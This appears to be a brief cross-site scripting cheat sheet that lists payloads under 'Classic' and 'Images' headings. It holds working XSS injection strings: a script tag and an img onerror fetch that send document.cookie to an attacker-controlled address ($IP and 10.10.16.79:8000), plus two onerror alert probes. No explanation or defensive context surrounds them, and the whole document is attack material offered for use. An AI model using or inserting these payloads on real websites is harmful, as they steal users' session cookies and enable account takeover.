Classic:
<script>var i=new Image(); i.src="http://$IP/?cookie="+btoa(document.cookie);</script>
Images:
<img src=x onerror=alert(”Hacked”)>
<img src=x onerror=alert(document.cookie)>
<img src=x onerror=fetch("http://10.10.16.79:8000/"+document.cookie);>